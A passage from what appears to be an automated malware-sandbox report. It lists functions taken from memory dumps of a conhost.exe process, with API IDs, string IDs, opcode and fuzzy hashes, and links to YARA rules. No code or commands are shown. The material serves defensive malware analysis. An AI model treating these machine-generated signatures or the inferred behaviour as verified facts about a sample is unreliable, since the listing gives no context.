                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 4bcb022f3e1e0b8fed5926caf64c3759d7ec3b97404da27ef6f8fbff42a8db79
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 5D81A3336006438AFA59AB65A4433D92790A7C57E6F14CF179A094779EDB78C845CFC0
                                                                    Function 000001DCB14E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: aca8e36943cad6765f1b3d5607982427ce8338ffe7ee767c7bfa47f014531a75
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: B331703221264291EE2ADB4AE4027E53394B788BF0F598F279E6D077DCDF39C545CA80
                                                                    Function 000001DCB14F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: cf8492b62be6158d982ad87687270f5ce1e507046737f55c4dc9dfa502002c8c
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 66115B31210A4286EB518B52E84639977A4F7C8FE4F144727EA5E87798CB38C914CB84
                                                                    Function 000001DCB14E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: b0701248d4d244a5dafc68678e609b7cc9da73d806f0c9d9ccf5ce01bde3542f
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: 16118B36300B4282EF199B21E4062A973B0FB88BC5F044A2BDE8D03798EF3DC605CB44
                                                                    Function 000001DCB14E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction ID: 2efe4dd25542e2b1334f9c22cb14d5e89877f76ff3a1be84c65be0682985c90a
                                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction Fuzzy Hash: 0ED1A736204B8986DA749B0AE49539A77A0F3C8BD4F104617EACE47BA9CF7CC551CF80
                                                                    Function 000001DCB14E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: a53387c1eeef2f212c7c3ea97cb55ac2d78b06c4b019cbac7f0c3e482c151602
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 9131C733701B5282EB19CF16D551BA967A0FB88BC4F088A239E4847B5DEF34C561CB80
                                                                    Function 000001DCB14E14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID: C:\Windows\system32\conhost.exe
                                                                    • API String ID: 3168794593-2100230096
                                                                    • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction ID: 576df3ef55ff53b928eaa5fc352cb4d832cff30ed3df5f520c42e961cf921978
                                                                    • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction Fuzzy Hash: A021A577508AD28AEB52DF259E562DD27A0F7C5BC4F094917DB4D4334BDE25C404CB80
                                                                    Function 000001DCB14ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 1dcd1f553b37aa95bfe4a425e1d360d23f823e56dd11789beb42e1cc39328e8d
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: A9115E3230028286FA6C973255573B922425BD47F4F148F27A83E867DEDE28C802CE80
                                                                    Function 000001DCB14E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: eb02efabe6924369c842312c8d45e7879d1d6f2b950d643dd41af93bfe01d87e
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: 29016D31300A4282EB24DB52B44979963A1F788FC4F488A37DE4D43758DF3CC949CB80
                                                                    Function 000001DCB14E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: 1f2b2f8a2f59a67fb912c18792d636d42f95318e13dcaed2a18e4aaf2ea1a068
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 01016D7561174686EF269B62E80A79633B0BB85BC2F144A27CD4D07758EF3DC508CB80
                                                                    Function 000001DCB14E9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 04911917c6cfd6313755c743836507514d95a868e8e36077fee7b1496b99f294
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 1D51B13370160286EB18DF25E449B99B796F384BC8F54CA2BDA16477CCEB75C841CB80
                                                                    Function 000001DCB14E8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 35416f02ceb9bce7972fa6cbb1b5d96039ff3a47102fe76809d1a221ff3846f3
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 4131B17320064196EB18DF21E84A7997BA5F380BC8F45CA1BEE5A0778DDB39C940CB84
                                                                    Function 000001DCB14E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: a8e015708c1cf91286ed304dc7415594bf48611249380ddcb9e2df3592c87fae
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: BCF0447230464292EB718F21F9857996761F788BC8F948523DA8D4665CDF3CC64DCF40
                                                                    Function 000001DCB14E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 87084438311af0aa5a08b3a7ebdf315b1cfbf44d6281a40e01baa085c5fa9e74
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: DAF08C71704B8282EE058B13B9061996760EBC8FC0F088A33EE4A47B1CDF3CC545CB80
                                                                    Function 000001DCB14EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: f907c8742a5ba34bea7fc9c718870f416e1e51564cc32766a889860c5a5f53ad
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: 69F06D72211A0681FF158F24E8463A96360EBC8BE1F544B1BCA6E463E8DF2CC049CB80
                                                                    Function 000001DCB14E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction ID: c4b07b57ed42e73712d1dd8fd11d8c6c1d9695b5eacf23a3b072bcc6d2d5841d
                                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction Fuzzy Hash: D802C437619B8186EBA4CB55E49539AB7A0F3C57D0F104517EA8E87BACDB78C484CF80
                                                                    Function 000001DCB14E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction ID: 6a6f3eb06189da698911d677218c810692eb9a414bba1d9530d638b6bfb1a698
                                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction Fuzzy Hash: 9461E63A518A42C6E7648B55E48539AB7E0F3C97D4F104A17EA8E4BBACDB7CC454CF80
                                                                    Function 000001DCAFC23504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 3d55f157ae879b8e100138e6626c93a35e3bd7841207d947630d50f09a9a4b4c
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: D8115133E14A5B11FE74356BE4553E91181EB5837CF4A8E3BBD6A076D6EB34C881C280
                                                                    Function 000001DCB14F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 975b7eb4e3024514b8e53927d42b33a07514c5652ce0402d8fe099772b8714ad
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: C8114F36B10A5711FF661569D6DB3E513416BE83F8F1C0F27A97E067DE8E24C845CA80
                                                                    Function 000001DCAFC1F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: b76f6ab19472dac82a49991b6ebd140ce9c9d9732cb763f944a0f77e70490eb1
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 6061903360024B82FE799A27E5443EA66A1B745788F674D17FA4A037E5FB74C861C388
                                                                    Function 000001DCB14EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 585a441b8fd835e620a43bf3da8065168387ce279e1c7d88da339573e18ee53b
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 9C613733600B85CAEB289F65D4413DD77A0F784B88F148A17EF4917B98DB78C599CB80
                                                                    Function 000001DCAFC1A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 1e20aded7887f0d8c3ef82d62b0530b9e8693ffdedcd17c7046f4ddea5da917e
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: BC518E3310028BCAEF748B17954439877A0F395F98F5A4A17EA8987BD5EB38D470C788
                                                                    Function 000001DCB14EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 71d7a18146d91f5d43cfd5537e51bea90033a2bc66c4cd87fbccb81b70c93105
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 0B519E73200282CAEB688F2594963D977A1F394BD4F28CB17DA8947BD9CB38C455CF81
                                                                    Function 000001DCAFC18405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 20161e1febb815d6026581c53f3f8bd2f0cdadec4370ddc11aabc870f39d9d65
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: C951B133A0960B86EF34DB16D444B99B795F354B9CF528926FA06437C8FB34CA61C788
                                                                    Function 000001DCAFC183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: c1a195d0bbe70dee89b6b754d25e38b56ca09b21a05f47a4d9d5ea186ac7a727
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 36318D3360574686EB24DF12E844799B7A4F344B9CF168816FE5B037C8EB38CA61C788
                                                                    Function 000001DCB14F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: 3f7b48d6dc793229d4f13c8a247ee474c390f3624271c64b4123079c20cf2826
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: 9AD1DE72B14A8189EB12CFA9D4416DC3BB1F3947D8F148627CE5D97B9DDA38C406CB80
                                                                    Function 000001DCB14F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: 5a4963966454fbf7f30982c592b0a82109d9a3a25fd158a67e281948fcc88a35
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: B891B27270065689FB62DF659446BED2BA0F784BC8F144A0BDE0E57B8DDB34C486CB80
                                                                    Function 000001DCB14E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
